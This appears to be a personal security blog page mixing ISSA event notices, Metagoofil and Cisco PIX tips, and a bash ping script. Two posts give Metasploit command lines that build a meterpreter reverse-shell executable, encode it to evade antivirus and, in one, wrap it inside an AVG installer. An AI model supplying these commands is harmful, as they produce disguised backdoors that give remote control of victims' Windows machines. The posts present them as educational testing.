Dr. Eric Cole will be presenting July 20th at the ITC building in Charlotte for Charlotte ISSA

Dr. Eric Cole, Ryan Linn, and JP Dunning are schedule to speak on July 20th at the ITC building (200 N. College, Charlotte, 28202). This will be a half day event starting at 9:00am going a little past lunch

For more information check out the Charlotte ISSA site here

Metasploit now has a Screenshot feature. Pretty cool.

Metasploit now has a Screenshot feature.  Pretty cool.

Check out the screen-shot feature from Metasploit.

Myrtle Beach Techno Security Conference is free to Charlotte ISSA members

For those Charlotte ISSA members that attended the 2010 ISSA Summit in April remember that the Myrtle Beach Techno Security Conference is free. This is a $1495 dollar value for free. I am going to try and go but I do not think my schedule will permit. The dates for this event is June 6th to the 9th. You can register for the event by emailing the following:

Registration:
Contact us at sh-admin@securityhorizon.com
or call 719-488-4500.

Download the registration form at http://www.securityhorizon.com/ISAM-Reg.pdf

TFTP script for PIX firewall's to a Linux box

Yeah I hate to say it but we are TFTPing our backup configs to a TFTP server even though to log into the server we use ssh.  Sometimes I just hate the Cisco IOS or maybe I am to stupid to figure out how to scp these suckers from there.  Anyhow if anyone is still TFTPing here is a basic script to touch the file so you can write it to the server.  Probably just need to update the IOS.  :)

 

Metagoofil - Command extract not found, please check and change the location.

If you get Command extract not found, please check and change the location when trying to use Metagoofil you need to do the following.

# which extract
mine came back with
/usr/bin/extract

So I now edit the file
# nano metagoofil.py

Comment out extcommand='/opt/local/bin/extract' and add the new location. Should look like this:

#extcommand='/opt/local/bin/extract'
extcommand='/usr/bin/extract'

Msfencode to bypass anti-virus

My little research has determined 2 worthy anti-virus solutions to determine or protect you against Metasploit payloads etc. This research has determined that Sophos and Microsoft Security Essentials are the only worthy engines for this type of attack. On some of the uploads to VirusTotal, DrWeb also found the file to be bad.

So here is what I typed in my Ubuntu system.  You have to have Metasploit installed.

windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=9090 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -o bad.exe

Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference.  Irongeek.com and offensive-security.com have some great video tutorials.  This is just a quick reference using meterpreter.

 


windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe

 

Simple Bash Script for obtaining IP addresses verse computer names

Situation: User gave me computer names but I need the ip addresses for over 300 machines so I can scan them.

Finished result below
*******************************
#!/bin/bash
var="-c 1"
for i in $(cat domainnames.txt | awk '{print $1}'); do ping=$(ping $i $var | grep data | awk '{print $3}' | sed s/"("/""/ | sed s/")"/""/ |sed s/":"/""/ >> ipsout.txt);done;
**************************************************
Explanation Below

The -c 1 gets you a single ping when running in a linux environment or from cygwin in windows.

New Car Break in method

This was sent to me from a friend.  Please take note criminals are using your technology to there advantage from uncommon methods.  This is not your typical phishing or social engineering attack.  They are applying the Aurora and Zues methods of slowing gathering information for a greater monetary loss.

Port Natting with Cisco Pix

#static (dmz,outside) tcp 1.2.3.4 www 172.16.1.80 8080 netmask 255.255.255.255 0 500

This will allow your outside ip address to connect via port 80 to a dmz box listening on 8080.